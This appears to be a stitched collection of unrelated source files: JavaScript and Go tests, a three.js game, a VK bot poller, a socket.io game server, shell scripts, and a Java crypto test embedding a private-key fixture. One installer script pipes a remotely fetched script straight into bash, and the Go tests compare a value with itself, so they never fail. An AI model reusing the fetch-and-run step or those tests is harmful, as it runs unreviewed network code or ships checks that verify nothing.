message: { id: jasmine.any(String), type: 'error', text: 'Events search failed. "some error"' }
})
done()
})
.catch((e) => done.fail(`test failed with promise error: ${e.message}`))
})
})
})
describe('#triggerSearch', () => {
let event, initialState, store
beforeEach(() => {
initialState = {
eventsFilters: {},
xhrStatus: { currentEventsOffset: 0 }
}
store = mockStore(initialState)
event = { id: 1 }
Mappersmith.Env.Fixture
.define('get')
.matching({ url: `/api/v1/events?limit=${EVENTS_SEARCH_LIMIT}&offset=0` })
.response([event])
})
it('creates TRIGGER_EVENTS_SEARCH and REQUEST actions', (done) => {
store.dispatch(triggerSearch()).then(() => {
const actions = store.getActions()
expect(actions[0]).toEqual({ type: TRIGGER_EVENTS_SEARCH })
expect(actions[1]).toEqual({ type: REQUEST_EVENTS_SEARCH_RESULTS })
expect(actions[2]).toEqual({ type: RECEIVE_EVENTS_SEARCH_RESULTS, events: [event], offset: 0 })
done()
})
.catch((e) => done.fail(`test failed with promise error: ${e.message}`))
})
})
describe('#loadMoreSearchResults', () => {
let event, initialState, store
beforeEach(() => {
initialState = {
eventsFilters: {},
xhrStatus: { currentEventsOffset: 4 }
}
store = mockStore(initialState)
event = { id: 1 }
Mappersmith.Env.Fixture
.define('get')
.matching({ url: `/api/v1/events?limit=${EVENTS_SEARCH_LIMIT}&offset=4` })
.response([event])
})
it('creates LOAD_MORE_EVENTS_SEARCH_RESULTS and REQUEST actions', (done) => {
store.dispatch(loadMoreSearchResults()).then(() => {
const actions = store.getActions()
expect(actions[0]).toEqual({ type: LOAD_MORE_EVENTS_SEARCH_RESULTS, offset: 4 + EVENTS_SEARCH_LIMIT })
expect(actions[1]).toEqual({ type: REQUEST_EVENTS_SEARCH_RESULTS })
expect(actions[2]).toEqual({ type: RECEIVE_EVENTS_SEARCH_RESULTS, events: [event], offset: 4 })
done()
})
.catch((e) => done.fail(`test failed with promise error: ${e.message}`))
})
})
})
|
#!/bin/sh
rm -rf lcmtest
|
import hashlib
key = hashlib.md5("Hello World!".encode())
print(key.hexdigest()) # 0a4d55a8d778e5022fab701977c5d840 |
/*
* Copyright 2018 The boardgame.io Authors
*
* Use of this source code is governed by a MIT-style
* license that can be found in the LICENSE file or at
* https://opensource.org/licenses/MIT.
*/
import React from 'react';
import * as THREE from 'three';
import { Client } from 'boardgame.io/client';
import TicTacToe from '../tic-tac-toe/game';
import './main.css';
class App extends React.Component {
state = {};
constructor(props) {
super(props);
this.client = Client({ game: TicTacToe });
this.client.subscribe(() => {
const { ctx } = this.client.getState();
if (ctx.gameover) {
this.setState({ gameover: ctx.gameover });
}
});
this.ref = null;
this.scene = new THREE.Scene();
this.renderer = new THREE.WebGLRenderer({ antialias: true });
this.mouse = new THREE.Vector2();
this.raycaster = new THREE.Raycaster();
this.rotation = 0;
this.cubes = [];
}
createScene() {
const scene = this.scene;
scene.background = new THREE.Color(0xffffff);
const camera = new THREE.PerspectiveCamera(
45,
window.innerWidth / window.innerHeight,
0.1,
1000
);
camera.position.z = 5;
camera.position.x = 12;
camera.position.y = 15;
scene.add(camera);
this.camera = camera;
for (let i = 0; i < 9; i++) {
const geometry = new THREE.BoxGeometry(1, 1, 1);
const material = new THREE.MeshLambertMaterial({ color: 0xcccccc });
const cube = new THREE.Mesh(geometry, material);
const r = Math.floor(i / 3);
const c = i % 3;
cube.position.z = -c * 2;
cube.position.x = r * 2;
cube.userData.i = i;
scene.add(cube);
this.cubes.push(cube);
}
this.camera.lookAt(this.cubes[4].position);
let light = new THREE.AmbientLight(0xffffff, 0.7);
scene.add(light);
light = new THREE.DirectionalLight(0x555555);
scene.add(light);
}
animate = () => {
requestAnimationFrame(this.animate);
const { G } = this.client.getState();
this.cubes.filter(c => G.cells[c.userData.i] == '0').forEach(c => {
c.material.color.setHex(0xff0000);
c.rotation.x = this.rotation;
});
this.cubes.filter(c => G.cells[c.userData.i] == '1').forEach(c => {
c.material.color.setHex(0x00ff00);
c.rotation.y = -this.rotation;
});
this.rotation += 0.03;
this.renderer.render(this.scene, this.camera);
};
onMouseMove = e => {
const x = e.clientX - this.ref.offsetParent.offsetLeft;
const y = e.clientY;
this.mouse.x = x / window.innerWidth * 2 - 1;
this.mouse.y = -(y / window.innerHeight) * 2 + 1;
this.raycaster.setFromCamera(this.mouse, this.camera);
const highlightedCubes = this.raycaster.intersectObjects(this.cubes);
if (highlightedCubes.length > 0) {
this.ref.style.cursor = 'pointer';
} else {
this.ref.style.cursor = '';
}
this.cubes.forEach(c => {
c.userData.highlight = false;
c.material.color.setHex(0xcccccc);
});
highlightedCubes.forEach(c => {
c.object.material.color.setHex(0xaaaaaa);
});
};
onMouseDown = () => {
this.raycaster.setFromCamera(this.mouse, this.camera);
this.raycaster.intersectObjects(this.cubes).forEach(cube => {
this.client.moves.clickCell(cube.object.userData.i);
});
};
componentDidMount() {
this.renderer.setSize(window.innerWidth, window.innerHeight);
this.ref.appendChild(this.renderer.domElement);
this.createScene();
this.animate();
}
render() {
let text = '';
if (this.state.gameover) {
if (this.state.gameover.draw) text = 'draw';
if (this.state.gameover.winner == '0') text = 'winner: red';
if (this.state.gameover.winner == '1') text = 'winner: green';
}
return (
<div
className="root"
onMouseDown={this.onMouseDown}
onMouseMove={this.onMouseMove}
ref={e => (this.ref = e)}
>
<div className="text">{text}</div>
</div>
);
}
}
const routes = [
{
path: '/threejs/main',
text: 'threejs',
component: App,
},
];
export default {
routes,
};
|
#!/bin/bash -x
nvidia-smi
echo "-------------------- running as Docker to test also: -----------"
sudo -i nvidia-smi -pm 1
sudo docker run --rm --gpus all nvidia/cuda:11.0-base nvidia-smi
|
<filename>src/main/java/w/bot/longpoll/SimpleVkBotLongPoll.java
/*
* Copyright 2022 Whilein
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package w.bot.longpoll;
import lombok.AccessLevel;
import lombok.Getter;
import lombok.RequiredArgsConstructor;
import lombok.experimental.FieldDefaults;
import lombok.experimental.NonFinal;
import lombok.extern.log4j.Log4j2;
import lombok.val;
import org.jetbrains.annotations.NotNull;
import w.bot.VkBot;
import w.bot.VkBotConfig;
import w.bot.longpoll.event.VkChatInviteUserEvent;
import w.bot.longpoll.event.VkChatKickUserEvent;
import w.bot.longpoll.event.VkMessageEvent;
import w.bot.type.Message;
import java.net.URI;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
/**
* @author whilein
*/
@Getter
@Log4j2
@FieldDefaults(level = AccessLevel.PRIVATE, makeFinal = true)
@RequiredArgsConstructor(access = AccessLevel.PRIVATE)
public final class SimpleVkBotLongPoll implements VkBotLongPoll {
private static final String URL = "%s?act=a_check&key=%s&ts=%s&wait=90";
VkBot vkBot;
int groupId;
@NonFinal
URI uri;
@NonFinal
String server, key, ts;
public static @NotNull VkBotLongPoll create(final @NotNull VkBot bot,
final @NotNull VkBotConfig.LongPoll config) {
return new SimpleVkBotLongPoll(bot, config.getGroupId());
}
private void _updateServer() {
val result = vkBot.groupsGetLongPollServer()
.groupId(groupId)
.make()
.call();
server = result.getServer();
key = result.getKey();
ts = result.getTs();
_updateUri();
}
private void _updateUri() {
this.uri = URI.create(URL.formatted(
server,
key,
ts
));
}
@Override
public void start() {
_updateServer();
while (true) {
try {
val request = HttpRequest.newBuilder()
.uri(uri)
.build();
val response = vkBot.getHttpClient()
.send(request, HttpResponse.BodyHandlers.ofByteArray());
val json = vkBot.getConfigProvider().parse(response.body());
val error = json.getInt("failed", 0);
switch (error) {
case 0 -> {
ts = json.getString("ts");
_updateUri();
for (val update : json.getObjectList("updates")) {
val type = update.getString("type", "");
switch (type) {
case "message_new" -> {
val message = update.findObject("object")
.map(object -> object.getAs("message", Message.class))
.orElseThrow();
val action = message.getAction();
if (action != null) {
switch (action.getType()) {
case "chat_invite_user" -> {
assert action.getMemberId() != null;
vkBot.dispatch(new VkChatInviteUserEvent(vkBot, message,
action.getMemberId(), action.getEmail()));
}
case "chat_kick_user" -> {
assert action.getMemberId() != null;
vkBot.dispatch(new VkChatKickUserEvent(vkBot, message,
action.getMemberId(), action.getEmail()));
}
}
} else {
vkBot.dispatch(new VkMessageEvent(vkBot, message));
}
}
// todo make another events
}
}
}
case 1 -> {
ts = String.valueOf(json.getInt("ts"));
log.debug("[LP] Получен failed 1: ts был обновлён на {}", ts);
_updateUri();
}
case 2, 3 -> {
log.debug("[LP] Получен failed {}: запрашиваем новый сервер и ключ", error);
_updateServer();
}
}
} catch (final Exception e) {
e.printStackTrace();
}
}
}
}
|
import ReactDOM from 'react-dom';
import App from '../app';
import React from 'react';
jest.mock('react-dom');
describe('index', () => {
it('initialises the react App', () => {
document.getElementById = jest.fn();
(document.getElementById as jest.Mock).mockReturnValue(
'test getElementById'
);
require('../index');
expect(ReactDOM.render).toHaveBeenCalledWith(
<App />,
'test getElementById'
);
expect(document.getElementById).toHaveBeenCalledWith('root');
});
});
|
#!/usr/bin/env bash
# Copyright (c) 2017 ZipRecruiter
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
export DEBUG=chromedriver_proxy:*
fuser -k 8080/tcp
(node fixtures/run_server.js &) && mocha --exit --timeout 10000 && fuser -k 8080/tcp
|
package com.outjected.email;
import java.io.IOException;
import java.util.UUID;
import javax.mail.internet.AddressException;
import javax.mail.internet.InternetAddress;
import javax.xml.bind.JAXBException;
import org.junit.Assert;
import org.junit.Test;
import com.google.common.io.Resources;
import com.outjected.email.api.ContentDisposition;
import com.outjected.email.api.EmailMessage;
import com.outjected.email.api.Header;
import com.outjected.email.api.MessagePriority;
import com.outjected.email.impl.attachments.BaseAttachment;
import com.outjected.email.util.XMLUtil;
public class XMLTests {
@Test
public void simple() throws AddressException, JAXBException, IOException {
EmailMessage msg = new EmailMessage();
msg.setMessageId(UUID.randomUUID().toString() + "@test.org");
msg.setImportance(MessagePriority.HIGH);
msg.getFromAddresses().add(new InternetAddress("<EMAIL>", "Mr. From"));
msg.getToAddresses().add(new InternetAddress("<EMAIL>"));
msg.getCcAddresses().add(new InternetAddress("<EMAIL>"));
msg.getBccAddresses().add(new InternetAddress("<EMAIL>"));
msg.setSubject("subject");
msg.setTextBody("text body");
msg.setHtmlBody("html body");
msg.addAttachment(new BaseAttachment("myfile.txt", "text/plain", ContentDisposition.ATTACHMENT, Resources.toByteArray(Resources.getResource("template.text.velocity"))));
msg.addAttachment(new BaseAttachment("myfile2.txt", "text/plain", ContentDisposition.ATTACHMENT, Resources.toByteArray(Resources.getResource("template.text.velocity"))));
msg.setEnvelopeFrom(new InternetAddress("<EMAIL>"));
msg.getReplyToAddresses().add(new InternetAddress("<EMAIL>"));
msg.getHeaders().add(new Header("Sender", "<EMAIL>"));
msg.getHeaders().add(new Header("X-Sender", "<EMAIL>"));
String xml = XMLUtil.marshal(msg);
EmailMessage umsg = XMLUtil.unmarshal(EmailMessage.class, xml);
Assert.assertTrue(msg.getType().equals(umsg.getType()));
Assert.assertTrue(msg.getCharset().equals(umsg.getCharset()));
Assert.assertTrue(msg.getImportance().equals(umsg.getImportance()));
Assert.assertTrue(msg.getToAddresses().get(0).equals(umsg.getToAddresses().get(0)));
Assert.assertTrue(msg.getFromAddresses().get(0).equals(umsg.getFromAddresses().get(0)));
Assert.assertTrue(msg.getCcAddresses().get(0).equals(umsg.getCcAddresses().get(0)));
Assert.assertTrue(msg.getBccAddresses().get(0).equals(umsg.getBccAddresses().get(0)));
Assert.assertTrue(msg.getSubject().equals(umsg.getSubject()));
Assert.assertTrue(msg.getTextBody().equals(umsg.getTextBody()));
Assert.assertTrue(msg.getHtmlBody().equals(umsg.getHtmlBody()));
Assert.assertTrue(msg.getMessageId().equals(umsg.getMessageId()));
Assert.assertTrue(msg.getAttachments().get(0).getFileName().equals(umsg.getAttachments().get(0).getFileName()));
}
}
|
<filename>src/main/java/de/core23/dicewars/misc/Game.java
package de.core23.dicewars.misc;
public interface Game {
final int[] COLORS = {0x2255FF, 0xCC4444, 0x44CC44, 0xAA22EE, 0xDDDD00, 0xFF8833, 0x777777, 0x55DDCC};
final int DICE_START = 3;
final int DICE_MAX = 8;
final int PLAYER_MAX = 8;
final int PLAYER_MIN = 2;
final int NUM_BLOCK_X = 46;
final int NUM_BLOCK_Y = 22;
}
|
set -x
kubectl rollout history deployment hello-deploy
|
<filename>build/types/utils/set_compare.d.ts
export declare function set_compare<T>(a: Set<T>, b: Set<T>): boolean;
|
#!/usr/bin/env bash
# Install Gruntwrok Installer
# See https://github.com/gruntwork-io/gruntwork-installer
# Install after Golang installation
# For colors, see https://stackoverflow.com/questions/5947742/how-to-change-the-output-color-of-echo-in-linux
RED='\033[0;31m'
YELLOW='\033[1;33m'
GREEN='\033[0;32m'
GRAY='\033[1;30m'
NC='\033[0m' # No Color
echo -e "\n${RED}Running installation of Gruntwork Installer and Terratest...${NC}\n"
# Run get_latest_release.sh
. ./get_latest_release.sh
# Save current directory
CURRENT_DIR=$(pwd)
cd ~ || exit
# Set version to download
GRUNTWORK_INSTALLER_VERSION=$(get_latest_release "gruntwork-io/gruntwork-installer")
TERRATEST_VERSION=$(get_latest_release "gruntwork-io/terratest")
curl -LsS https://raw.githubusercontent.com/gruntwork-io/gruntwork-installer/master/bootstrap-gruntwork-installer.sh | bash /dev/stdin --version "${GRUNTWORK_INSTALLER_VERSION}"
gruntwork-install --binary-name 'terratest_log_parser' --repo 'https://github.com/gruntwork-io/terratest' --tag "${TERRATEST_VERSION}"
# Set back to the original current directory
cd "$CURRENT_DIR" || exit
echo -e "${GREEN}Gruntwork Installer and Terratest installation complete.${NC}\n"
|
<reponame>arp242/zstd<filename>zbyte/zbyte_test.go
package zbyte
import (
"testing"
)
func TestBinary(t *testing.T) {
tests := []struct {
in []byte
want bool
}{
{[]byte(""), false},
{[]byte("€"), false},
{[]byte("helllo\x00"), true},
}
for _, tt := range tests {
t.Run("", func(t *testing.T) {
have := Binary(tt.in)
if have != tt.want {
t.Errorf("want: %t; have: %t", tt.want, have)
}
})
}
}
func TestElideLeft(t *testing.T) {
tests := []struct {
in []byte
n int
want []byte
}{
{[]byte("abcdef"), 6, []byte("abcdef")},
{[]byte("abcdef"), 2, []byte("ab")},
{[]byte("abcdef"), 0, []byte("")},
}
for _, tt := range tests {
t.Run("", func(t *testing.T) {
have := ElideLeft(tt.in, tt.n)
if string(have) != string(have) {
t.Errorf("want: %s; have: %s", tt.want, have)
}
})
}
}
func TestElideRight(t *testing.T) {
tests := []struct {
in []byte
n int
want []byte
}{
{[]byte("abcdef"), 6, []byte("abcdef")},
{[]byte("abcdef"), 2, []byte("ef")},
{[]byte("abcdef"), 0, []byte("")},
}
for _, tt := range tests {
t.Run("", func(t *testing.T) {
have := ElideRight(tt.in, tt.n)
if string(have) != string(have) {
t.Errorf("want: %s; have: %s", tt.want, have)
}
})
}
}
|
import express, { Application } from 'express';
import http from 'http';
import os from 'os';
import socketIo, { Server } from 'socket.io';
import {
SessionMessage,
SessionJoinMessage,
SessionLeaveMessage,
SessionDeleteMessage,
CardsUpdateMessage,
PlayersUpdateMessage,
ServerOptions,
GameSessionsPersistence,
} from './interfaces';
import {
PLAYER_START,
PLAYER_JOIN,
PLAYER_LEAVE,
CARDS_UPDATE,
PLAYERS_UPDATE,
GAME_SESSION_DELETE,
GAME_SESSIONS_UPDATE,
} from './game-events';
import {
CONNECTION,
CLOSE,
} from './io-events';
/**
* The game socket server receiving and sending game and connection events.
*/
export class GameServer {
/**
* Timeout reference for the game sessions send interval.
*/
private timeout: NodeJS.Timeout;
/**
* The underlying (express) HTTP server.
*/
private httpServer: http.Server;
/**
* The socket game server.
*/
private io: Server;
/**
* Whether stopping game server at the moment.
*/
private stopping: boolean;
/**
* Creates an instance of game server and starts it with the given options.
* @param options - The game server options.
*/
constructor(options: ServerOptions) {
this.stopping = false;
const expressApp: Application = express();
this.httpServer = http.createServer(expressApp);
this.io = socketIo(this.httpServer);
this.initHttpServerRoutes(expressApp, options.port);
this.timeout = this.initGameSessionsSendInterval(this.io, options);
this.initSocketEventListeners(this.io, options);
this.start(options.port);
}
/**
* Handles event error (logging).
* @param err - The error occurred.
* @param event - The current event
*/
private handleEventError(err: Error, event: string) {
console.error(`SERVER: error caught on ${event}: ${err.stack}`);
}
/**
* Inits the HTTP server routes.
* @param app - The express application (HTTP server).
* @param port - The port the server is listening.
*/
private initHttpServerRoutes(app: Application, port: number) {
app.get('/', (req, res) => {
res.send(`
<h1>Memory Game Server listening on port ${port}...</h1>
<button onclick="window.location.href='/stop'" type="button">Stop Server</button>
`);
});
app.get('/ping', (req, res) => {
console.log('SERVER: sending "pong"');
res.send('pong');
});
app.get('/stop', (req, res) => {
this.stop();
this.stopping = true;
res.send(`
<script>
window.onload = function() {
setTimeout(function() {
// similar behavior as clicking on a link
window.location.href = "/";
}, 5000);
}
</script>
<h1>Stopping Memory Game Server...</h1>
`);
});
}
/**
* Inits game sessions send interval for the socket server.
* @param io - The socket server.
* @param options - The server options.
* @returns The itervall timeout object for later reference when closing server gracefully.
*/
private initGameSessionsSendInterval(io: Server, options: ServerOptions) {
return setInterval(() => {
const sessions = options.gameSessionsPersistence.readAll();
// console.log(`SERVER: emitting game sessions =>\n${JSON.stringify(sessions, null, 2)}`);
io.emit(GAME_SESSIONS_UPDATE, sessions);
}, options.gameSessionsUpdateSendInterval);
}
/**
* Inits socket event listeners.
* @param io - The socket server.
* @param options - The server options.
*/
private initSocketEventListeners(io: Server, options: ServerOptions) {
const sessionsDB: GameSessionsPersistence = options.gameSessionsPersistence;
io.on(CONNECTION, (socket) => {
let previousId: string;
// Join the right session.
const safeJoin = (currentId: string) => {
socket.leave(previousId);
socket.join(currentId);
previousId = currentId;
};
socket.on(PLAYER_START, (session: SessionMessage) => {
try {
// console.log(`SERVER: on PLAYER_START =>\n${JSON.stringify(session, null, 2)}`);
safeJoin(session.id);
sessionsDB.create(session);
io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
socket.emit(PLAYER_START, session);
// socket.to(session.id).emit(PLAYER_START, session); // TODO is this really necessary?
} catch (err) {
this.handleEventError(err, PLAYER_START);
}
});
socket.on(PLAYER_JOIN, (session: SessionJoinMessage) => {
try {
// console.log(`SERVER: on PLAYER_JOIN =>\n${JSON.stringify(session, null, 2)}`);
safeJoin(session.id);
const currentSession = sessionsDB.read(session.id);
sessionsDB.update(session.id, {
id: session.id,
name: currentSession.name,
status: 'joined',
sessionOwnerNetworkId: currentSession.sessionOwnerNetworkId,
senderPlayerIndex: session.senderPlayerIndex,
senderPlayerNetworkId: session.senderPlayerNetworkId,
players: session.players,
cards: currentSession.cards,
});
io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
socket.emit(PLAYER_JOIN, session);
socket.to(session.id).emit(PLAYER_JOIN, session);
} catch (err) {
this.handleEventError(err, PLAYER_JOIN);
}
});
socket.on(PLAYER_LEAVE, (session: SessionLeaveMessage) => {
try {
// console.log(`SERVER: on PLAYER_LEAVE =>\n${JSON.stringify(session, null, 2)}`);
let sessionToLeave;
if (session.players.length === 0) {
// console.log(`SERVER: on PLAYER_LEAVE => players count is 0 => delete sesssion:\n${JSON.stringify(session, null, 2)}`);
sessionToLeave = sessionsDB.delete(session.id);
} else {
const currentSession = sessionsDB.read(session.id);
sessionToLeave = sessionsDB.update(session.id, {
id: session.id,
name: currentSession.name,
status: session.players.length === 1 ? 'open' : 'joined', // enables more than 2 players!
sessionOwnerNetworkId: currentSession.sessionOwnerNetworkId,
senderPlayerIndex: session.senderPlayerIndex,
senderPlayerNetworkId: session.senderPlayerNetworkId,
players: session.players,
cards: currentSession.cards,
});
}
io.emit(PLAYER_LEAVE, sessionToLeave);
io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
socket.emit(PLAYER_LEAVE, session); // TODO is this useful?
socket.to(session.id).emit(PLAYER_LEAVE, session);
} catch (err) {
this.handleEventError(err, PLAYER_LEAVE);
}
});
socket.on(CARDS_UPDATE, (update: CardsUpdateMessage) => {
try {
const id = update.sessionId;
const currentSession = sessionsDB.read(id);
sessionsDB.update(id, {
id,
name: currentSession.name,
status: currentSession.status,
sessionOwnerNetworkId: currentSession.sessionOwnerNetworkId,
senderPlayerIndex: update.senderPlayerIndex,
senderPlayerNetworkId: update.senderPlayerNetworkId,
players: currentSession.players,
cards: update.cards,
});
io.emit(CARDS_UPDATE, update);
socket.to(update.sessionId).emit(CARDS_UPDATE, update);
io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
} catch (err) {
this.handleEventError(err, CARDS_UPDATE);
}
});
socket.on(PLAYERS_UPDATE, (update: PlayersUpdateMessage) => {
try {
// console.log('PLAYERS_UPDATE');
// console.log(`SERVER: on PLAYERS_UPDATE =>\n${JSON.stringify(update, null, 2)}`);
const id = update.sessionId;
const currentSession = sessionsDB.read(id);
// console.log(`CURRENT SESSION: ${JSON.stringify(currentSession, null)}`)
sessionsDB.update(id, {
id,
name: currentSession.name,
status: currentSession.status,
sessionOwnerNetworkId: currentSession.sessionOwnerNetworkId,
senderPlayerIndex: update.senderPlayerIndex,
senderPlayerNetworkId: update.senderPlayerNetworkId,
players: update.players,
cards: currentSession.cards,
});
io.emit(PLAYERS_UPDATE, update);
socket.to(id).emit(PLAYERS_UPDATE, update);
io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
} catch (err) {
this.handleEventError(err, PLAYERS_UPDATE);
}
});
socket.on(GAME_SESSION_DELETE, (session: SessionDeleteMessage) => {
try {
// console.log(`SERVER: on GAME_SESSION_DELETE =>\n${JSON.stringify(session, null, 2)}`);
safeJoin(session.id);
const currentSession = sessionsDB.read(session.id);
if (currentSession.sessionOwnerNetworkId === session.senderPlayerNetworkId) {
sessionsDB.delete(session.id);
socket.emit(GAME_SESSION_DELETE, session);
socket.to(session.id).emit(GAME_SESSION_DELETE, session);
io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
} else {
console.error(`SERVER: player with ID '${session.senderPlayerNetworkId}'` +
` is not allowed to delete session with ID '${session.id}'!`);
}
} catch (err) {
this.handleEventError(err, GAME_SESSION_DELETE);
}
});
try {
io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
} catch (err) {
this.handleEventError(err, GAME_SESSIONS_UPDATE);
}
});
io.on(CLOSE, () => {
setTimeout(() => {
console.log('SOCKET-SERVER: websockets closed!');
this.httpServer.close((err?: Error) => {
if (err) {
console.error(`SERVER: closed HTTP server with error: ${err.stack}!`);
} else {
console.log('SERVER: HTTP server closed!');
}
});
}, 500);
});
}
/**
* Starts game server.
* @param port - The port the server starts on.
*/
private start(port: number) {
this.httpServer.listen(port);
console.log(`SERVER: listening on http://${os.hostname()}:${port} ...`);
try {
const en0Ipv4 = os.networkInterfaces().en0.find((elem) => (elem.family === 'IPv4'));
const ip = en0Ipv4 ? en0Ipv4.address : undefined;
if (ip) {
console.log(`SERVER: listening on http://${ip}:${port} ...`);
}
} catch (_) { } // Do not fail if we cannot detect!
}
/**
* Stops game server gracefully.
*/
public stop() {
if (!this.stopping) { // Do not execute once it is called multiple times!
this.stopping = true;
console.log('SERVER: server is stopping gracefully...');
console.log('SERVER: server is cleaning up...');
console.log('SOCKET-SERVER: clearing session send interval...');
clearInterval(this.timeout);
console.log('SOCKET-SERVER: closing websockets...');
this.io.close();
console.log('SERVER: server has been stopped!');
}
}
}
|
"use strict";
import React from 'react';
class Application extends React.Component {
static displayName = "@Application";
constructor() {
super();
const response = app("response");
this._isMounted = false;
this._mountedCallback = null;
this._event = app("events");
this.state = {
children: response.send()
};
this._responseEvent = this._event.addListener("app.response", ({ element }) => {
if (this._isMounted) {
return this.setState({
children: element
});
}
this._mountedCallback = () => this.setState({
children: element
});
});
this._reloadEvent = this._event.addListener("app.reload", () => {
if (this._isMounted) {
return this.setState({
children: null
}, () => {
this.setState({
children: response.send()
});
});
}
this._mountedCallback = () => this.setState({
children: null
}, () => {
this.setState({
children: response.send()
});
});
});
}
getSnapshotBeforeUpdate() {
this._event.emit("app.component.update");
this._isMounted = false;
return null;
}
shouldComponentUpdate(nextProps, nextState) {
return (
this.state.children !== nextState.children
);
}
render() {
this._event.emit("app.component.render");
return this.state.children;
}
componentDidMount() {
this._isMounted = true;
if( this._mountedCallback ) {
this._mountedCallback();
}
this._event.emit("app.component.mounted");
}
componentDidUpdate() {
this._isMounted = true;
if (this._mountedCallback) {
this._mountedCallback();
}
this._event.emit("app.component.updated");
}
componentWillUnmount() {
this._responseEvent
&& this._responseEvent.remove
&& this._responseEvent.remove()
;
this._reloadEvent
&& this._reloadEvent.remove
&& this._reloadEvent.remove()
;
this._event.emit("app.component.unmount");
}
}
export default Application; |
#ifndef MMTIMER_H
#define MMTIMER_H
#include <windows.h>
#include <mmsystem.h>
#include <QObject>
class MMTimer : public QObject
{
Q_OBJECT
public:
friend void WINAPI CALLBACK mmtimer_proc(uint, uint, DWORD_PTR user, DWORD_PTR, DWORD_PTR);
explicit MMTimer(int interval, QObject *parent=nullptr);
signals:
void timeout();
public slots:
void start();
void stop();
private:
int interval;
int id;
};
#endif // MMTIMER_H
|
def search_list(head, val):
if head is None:
return False
if head.data == val:
return True
return search_list(head.next, val) |
<reponame>NickGraeff/launchkey-java
package com.iovation.launchkey.sdk.crypto;
import org.apache.commons.codec.binary.Base64;
import org.bouncycastle.jce.provider.BouncyCastleProvider;
import org.bouncycastle.util.encoders.Hex;
import org.bouncycastle.util.io.pem.PemObject;
import org.bouncycastle.util.io.pem.PemReader;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import java.io.StringReader;
import java.security.KeyFactory;
import java.security.interfaces.RSAPrivateKey;
import java.security.interfaces.RSAPublicKey;
import java.security.spec.PKCS8EncodedKeySpec;
import java.security.spec.X509EncodedKeySpec;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotNull;
public class JCECryptoTest {
@SuppressWarnings("SpellCheckingInspection")
private static final String PRIVATE_KEY =
("-----BEGIN RSA PRIVATE KEY-----\n" +
"<KEY>" +
"<KEY>" +
"<KEY>" +
"<KEY>" +
"<KEY>" +
"<KEY>WNAtMWt2egYAe6XOEXIWOiQIDAQABAoIBADUmDOzZ0DAI0WPS\n" +
"m7rywqk5dIRu5AgDn9EYfn3FsH1heO1GR/xEq8pWv7KM+zKpS6uFwbDdGqDaB9Bu\n" +
"OiNW08ZWloBN0tL+ROw0rzVD8uA8UXnEY8sl2EMHRKDd2x+SV5yMHXuLzqu9d1RS\n" +
"7/lRLojGacnMOuf/WEKmz2+sC73UDfYm7Kq39LStE0Hi9iAq8eF+9U8b3l7Pikx/\n" +
"t70wOfCQJCrlfAFn0MdoxXoybr4HCy7tA2pqWPG2yhGnROaJSA430UNJQ9sU9p5M\n" +
"<KEY>" +
"mcIhiNECgYEAxju+IzfDHis3GSu/6GALoDnxLpOi3y8QjBBa8nEd4XpRGAyaHgbt\n" +
"/Q03Sd9jfST0jP7hKyJPWiPR5l4M9BpCEuQlhxdpSdy0acvXhuwdAWawaOHkMcUV\n" +
"iBZfzOB0VY2L55RVpaAqO1rq0EOydsD3n9uX/eEjWiaEEZNhdzrcgkUCgYEA3Vva\n" +
"cW4wguSB7VWJDJCd+o69AS29tBQBqYtCXRokmzWU6hitNa36wJMI2/fTW2lxegAi\n" +
"8RJ8HRAj8D3GpwbdIm5tgH+2EBoGqraxwXfyt4NKiVvRFEyg0zLq31U9VDm11BlG\n" +
"KU6XdxzD5aC+/txML+ib85WQsVInKVdP5pXowXUCgYB2scT6f2QER2n5V1nUQNYV\n" +
"PTxtYBcQvbSRuSVLr3Ft1fiChuEtA4cyktw9DlYa06reVarrUeLjnTkMT9o/uw0/\n" +
"FH5n8huoD0+zXUuSzQPdF+ifFEq3hkOLNaJtISRnKZbQtd/GiS1gVuLsiuxr8MUU\n" +
"Yb8TU+AAFbnUcEPWyVbJZQKBgBPtjQDhNqTSBZBkPu5OpqpD52gPwiBQHMYyr0rK\n" +
"a7k9XaalihJnE0f69LU43mJAX+Ln2D1zuJC1P0cFiLjIuWe8IUeMN8vDTA5aXC5a\n" +
"qhMzUqaDCZOWQnRBBTwN5HOMrn3luJdHaANlJ42opwkys/ksK74GHPyZtMTYA21y\n" +
"2X1xAoGAW3Yu0n/VcvDcQZmE++iPDKLD/Mpc18G1sRLNwrdhVEgRVk8sfYiQxmOb\n" +
"NNHiXe4njK7waEKHPo86poV22FAum0zBMFSf9igfCk5kuL/pk4EVa58NftF69S8V\n" +
